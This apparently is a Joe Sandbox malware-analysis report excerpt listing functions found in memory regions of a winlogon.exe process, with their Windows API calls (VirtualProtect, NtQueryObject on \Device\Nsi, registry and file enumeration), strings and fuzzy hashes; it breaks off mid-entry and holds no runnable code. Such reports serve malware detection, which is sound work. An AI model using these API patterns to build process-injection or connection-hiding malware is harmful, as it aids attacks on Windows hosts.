Part of subcall function 000001E858981724: HeapAlloc.KERNEL32 ref: 000001E85898173E
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E8589817AE
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E8589817DB
Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E8589817F5
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E858981815
Part of subcall function 000001E858981724: RegCloseKey.KERNELBASE ref: 000001E858981830
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E858981850
Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E85898186B
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E85898188B
Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E8589818A6
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E8589818C6

SleepEx.KERNELBASE ref: 000001E858981BDF

Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E8589818E1
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E858981901
Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E85898191C
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E85898193C
Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E858981957
Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E858981977
Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E858981992
Part of subcall function 000001E858981724: RegCloseKey.KERNELBASE ref: 000001E85898199C

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: fb2d69a08c0bd96be6d9827e63446f9b261ba6250bb68e8c4871137dd0e1c47c
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: CD319875221AC2C1FB54BB26DD513EDF3A5AF88BD0F1454339E0E87696EF24C8918A18

Function 000001E8589BF370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001E8589BF390

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: dfb11766e9a772cea2b6d458dc12c81d8fe618a40f6df5f239d096cd6c77f89e
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: DED0C935732580C3E300DB11D8467D9A328F798701FC04016E94E926958F7CC659CB50

Function 000001E8589EF370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001E8589EF390

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: 4f415aab6ec79a6ad15c0757f50b7ca393db4c01867619b1dc6f6e15564129b6
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: 0DD0C935731580C3E3059B11D8867D9A228FB98701FD04016E94E826948F7CC659CB51

Function 000001E85898F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001E85898F390

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: f2f82aea16852abb07a512e0575c6dfa6c3969893e8edacd0d110e93ebb99610
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: AFD0C935B31590C3E3009B11D8867EAA229F798701FC04016E94E926949F7CC659CB50

Non-executed Functions

Function 000001E8589B2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001E8589B3094
lstrlenW.KERNEL32 ref: 000001E8589B32BE

Part of subcall function 000001E8589B1A30: OpenProcess.KERNEL32 ref: 000001E8589B1A56
Part of subcall function 000001E8589B1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001E8589B1A74
Part of subcall function 000001E8589B1A30: PathFindFileNameW.SHLWAPI ref: 000001E8589B1A83
Part of subcall function 000001E8589B1A30: lstrlenW.KERNEL32 ref: 000001E8589B1A8F
Part of subcall function 000001E8589B1A30: StrCpyW.SHLWAPI ref: 000001E8589B1AA2
Part of subcall function 000001E8589B1A30: CloseHandle.KERNEL32 ref: 000001E8589B1AB0

GetProcAddress.KERNEL32 ref: 000001E8589B30A9

Part of subcall function 000001E8589B3F88: StrCmpNIW.SHLWAPI(?,?,?,000001E8589B272F), ref: 000001E8589B3FA0

StrCmpNIW.SHLWAPI ref: 000001E8589B30EC
lstrlenW.KERNEL32 ref: 000001E8589B3214

Strings

ntdll.dll, xrefs: 000001E8589B308D
\Device\Nsi, xrefs: 000001E8589B30DF
NtQueryObject, xrefs: 000001E8589B309F

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 3dd74bc31553336e469a116e649b845105e530a3f741a7ff32162260d63baafc
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 8EB125322286D0CAEB64DE66D9407EEF7A4FB44B86F44502AEE0D53A94EE35C980D740

Function 000001E8589E2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001E8589E3094
lstrlenW.KERNEL32 ref: 000001E8589E32BE

Part of subcall function 000001E8589E1A30: OpenProcess.KERNEL32 ref: 000001E8589E1A56
Part of subcall function 000001E8589E1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001E8589E1A74
Part of subcall function 000001E8589E1A30: PathFindFileNameW.SHLWAPI ref: 000001E8589E1A83
Part of subcall function 000001E8589E1A30: lstrlenW.KERNEL32 ref: 000001E8589E1A8F
Part of subcall function 000001E8589E1A30: StrCpyW.SHLWAPI ref: 000001E8589E1AA2
Part of subcall function 000001E8589E1A30: CloseHandle.KERNEL32 ref: 000001E8589E1AB0

GetProcAddress.KERNEL32 ref: 000001E8589E30A9

Part of subcall function 000001E8589E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001E8589E272F), ref: 000001E8589E3FA0

StrCmpNIW.SHLWAPI ref: 000001E8589E30EC
lstrlenW.KERNEL32 ref: 000001E8589E3214

Strings

NtQueryObject, xrefs: 000001E8589E309F
\Device\Nsi, xrefs: 000001E8589E30DF
ntdll.dll, xrefs: 000001E8589E308D

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 4d69a82f80f6177ff8abf5a2c3fd8027fa005c9ce5d3e124411889fbcd1d775c
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 4DB135322206D0C6EB699F26D9407EDFBA4FB44B88F54502BEE4D53B94EE35C9A0D340

Function 000001E858982FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001E858983094
lstrlenW.KERNEL32 ref: 000001E8589832BE

Part of subcall function 000001E858981A30: OpenProcess.KERNEL32 ref: 000001E858981A56
Part of subcall function 000001E858981A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001E858981A74
Part of subcall function 000001E858981A30: PathFindFileNameW.SHLWAPI ref: 000001E858981A83
Part of subcall function 000001E858981A30: lstrlenW.KERNEL32 ref: 000001E858981A8F
Part of subcall function 000001E858981A30: StrCpyW.SHLWAPI ref: 000001E858981AA2
Part of subcall function 000001E858981A30: CloseHandle.KERNEL32 ref: 000001E858981AB0

GetProcAddress.KERNEL32 ref: 000001E8589830A9

Part of subcall function 000001E858983F88: StrCmpNIW.SHLWAPI(?,?,?,000001E85898272F), ref: 000001E858983FA0

StrCmpNIW.SHLWAPI ref: 000001E8589830EC
lstrlenW.KERNEL32 ref: 000001E858983214

Strings

NtQueryObject, xrefs: 000001E85898309F
\Device\Nsi, xrefs: 000001E8589830DF
ntdll.dll, xrefs: 000001E85898308D

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 1ab4ae281b618004404ddc054f8e542846d077b8982b1782c31e5e65b4e15204
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 9EB137722206D2C6EB699F26D9407EDF3A5FB44B94F44502BEE0D53B94EE39C980DB40

Function 000001E8589ECD80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001E8589ECE0B
RtlLookupFunctionEntry.NTDLL ref: 000001E8589ECE23
RtlVirtualUnwind.NTDLL ref: 000001E8589ECE5E
IsDebuggerPresent.KERNEL32 ref: 000001E8589ECE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001E8589ECEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001E8589ECEAC

Strings

!-M, xrefs: 000001E8589ECD9D

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID: !-M
API String ID: 1239891234-3625753649
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 01c22d40d67caee32f25ddbafaa66bab3ee175e491cf739d248804ca7decac6b
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 90413C36224BC0C6E764CF25E8803DEB7A4FB88758F540226EE9D46B99EF78C555CB00

Function 000001E8589B84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001E8589B84CC
RtlCaptureContext.NTDLL ref: 000001E8589B84F9
RtlLookupFunctionEntry.NTDLL ref: 000001E8589B8513
RtlVirtualUnwind.NTDLL ref: 000001E8589B8554
IsDebuggerPresent.KERNEL32 ref: 000001E8589B85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001E8589B85C5
UnhandledExceptionFilter.KERNEL32 ref: 000001E8589B85D0

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 4d94faa3517b8f4b4b7c4761e03c69a9c84a3d1b981e2f9ac65ab088dadb43d4
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 66311872215BC0CAEB608F60E8943EEB7A4FB88755F44402ADA4E57B98DF79C648C710

Function 000001E8589E84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001E8589E84CC
RtlCaptureContext.NTDLL ref: 000001E8589E84F9
RtlLookupFunctionEntry.NTDLL ref: 000001E8589E8513
RtlVirtualUnwind.NTDLL ref: 000001E8589E8554
IsDebuggerPresent.KERNEL32 ref: 000001E8589E85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001E8589E85C5
UnhandledExceptionFilter.KERNEL32 ref: 000001E8589E85D0

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 09820439451dbd9fb6031bfa6a3cde868affece6c5833c46c5ca416d992b05db
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: BF313B72215BC0C6EB658F64E8803EEB764FB84748F44412ADE4E57B99EF78C658C710

Function 000001E8589884B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001E8589884CC
RtlCaptureContext.NTDLL ref: 000001E8589884F9
RtlLookupFunctionEntry.NTDLL ref: 000001E858988513
RtlVirtualUnwind.NTDLL ref: 000001E858988554
IsDebuggerPresent.KERNEL32 ref: 000001E8589885A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001E8589885C5
UnhandledExceptionFilter.KERNEL32 ref: 000001E8589885D0

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 8c3f445c0f8876fcb5e428ec2aad33fc54000e6abf4a6d6430b2ec152b93bf48
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 79313B72215BC0CAEB608F60E8817EEB365FB84748F44402ADE4E57B98DF78C648CB10

Function 000001E8589BCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001E8589BCE0B
RtlLookupFunctionEntry.NTDLL ref: 000001E8589BCE23
RtlVirtualUnwind.NTDLL ref: 000001E8589BCE5E
IsDebuggerPresent.KERNEL32 ref: 000001E8589BCE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001E8589BCEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001E8589BCEAC

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 0a1f2b7ceae55511e3414ee66d89826adcf93ba378b3c8c3605dc472ab105797
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: D6411C36224BC0CAE760CB25E8443DEB7A4FB88799F540126EE9D46B99DF38C555CB40

Function 000001E85898CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001E85898CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001E85898CE23
RtlVirtualUnwind.NTDLL ref: 000001E85898CE5E
IsDebuggerPresent.KERNEL32 ref: 000001E85898CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001E85898CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001E85898CEAC

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 3a26f121736f4146febb2bc5c8b44c13b298d55dc01b7a6c8325b02fe311f150
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: D6412B36224BC0C6EB60CF25E8413EEB3A5FB88758F540226EE9D46B99DF38C555CB40

Function 000001E8589EDA18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001E8589EDB99
FindNextFileW.KERNEL32 ref: 000001E8589EDCCF
FindClose.KERNEL32 ref: 000001E8589EDD0F
FindClose.KERNEL32 ref: 000001E8589EDD3B

Strings

!-M, xrefs: 000001E8589EDA32

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID: !-M
API String ID: 1164774033-3625753649
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 18374baf47c53f3a207a16ef47d1b0f913938ab9ce1ebf52a422d8599eb7dced
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 55A193327246C1CAFB219B79E8843FDBFA1ABC5794F1441369E9D2BB95DE38C4518700

Function 000001E8589BDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001E8589BDB99
FindNextFileW.KERNEL32 ref: 000001E8589BDCCF
FindClose.KERNEL32 ref: 000001E8589BDD0F
FindClose.KERNEL32 ref: 000001E8589BDD3B

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
